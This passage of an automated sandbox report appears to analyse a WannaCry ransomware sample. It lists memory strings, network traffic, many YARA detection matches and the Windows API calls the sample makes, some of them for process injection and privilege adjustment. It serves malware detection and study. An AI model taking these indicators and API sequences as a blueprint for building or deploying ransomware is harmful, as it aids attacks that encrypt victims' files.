Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
Source: svchost.exe, 00000009.00000002.2774950845.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487880092.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.cn/shellRESP
Source: svchost.exe, 00000009.00000002.2774950845.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487880092.00000138EDB2D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com/shell
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: mssecsvc.exe, 00000006.00000002.1710923691.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.kryptoslogic.com
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50492 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61806
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61906
Source: unknown	Network traffic detected: HTTP traffic on port 61806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50492
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 61906 -> 443

Spam, unwanted Advertisements and Ransom Demands

Yara detected Wannacry ransomware

Source: Yara match	File source: GeW4GzT8G8.dll, type: SAMPLE
Source: Yara match	File source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.2501948.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1fd20a4.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.24f28c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.1fd6104.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.mssecsvc.exe.24fd8e8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1693222311.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1467969506.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1709919485.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2279802499.000000000042E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1507342095.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1495917347.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 4432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mssecsvc.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\tasksche.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\mssecsvc.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: GeW4GzT8G8.dll, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: GeW4GzT8G8.dll, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.24f28c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1fc7084.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.2501948.7.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.2501948.7.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1fd20a4.2.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1fd20a4.2.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.1ff9128.3.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.2.mssecsvc.exe.1fc7084.4.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.252496c.9.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 17.2.mssecsvc.exe.24f28c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.24f28c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 17.2.mssecsvc.exe.1fd6104.5.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.1fd6104.5.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 17.2.mssecsvc.exe.24fd8e8.6.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 17.2.mssecsvc.exe.24fd8e8.6.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: C:\Windows\mssecsvc.exe, type: DROPPED	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team

Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	6_2_00AD05F2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	6_2_00AD042D
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD252F NtOpenSection,	6_2_00AD252F
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD116F LoadLibraryA,GetModuleHandleA,lstrcat,lstrcatW,CreateEventA,CreateFileMappingA,GetDriveTypeA,GetFileAttributesA,GetFileTime,GetModuleFileNameA,GetSystemTime,GetTempPathA,GetVersion,GetVersionExA,MapViewOfFile,SetEndOfFile,SetFileAttributesA,UnmapViewOfFile,WriteFile,LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_00AD116F
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	6_2_00AD2574
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	6_2_00AD2477
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD24AE lstrcpyW,lstrlenW,NtCreateSection,	6_2_00AD24AE
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_00AD33E0
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_00AD1422
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_00AD3405
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_00AD144A
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE333E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_7FE333E0
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE305F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	6_2_7FE305F2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE324AE lstrcpyW,lstrlenW,NtCreateSection,	6_2_7FE324AE
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE32477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	6_2_7FE32477
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE32574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	6_2_7FE32574
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE3144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_7FE3144A
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE31422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	6_2_7FE31422
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE3252F NtOpenSection,	6_2_7FE3252F
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE3042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	6_2_7FE3042D
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	6_2_7FE33405
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE433E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	12_2_7FE433E0
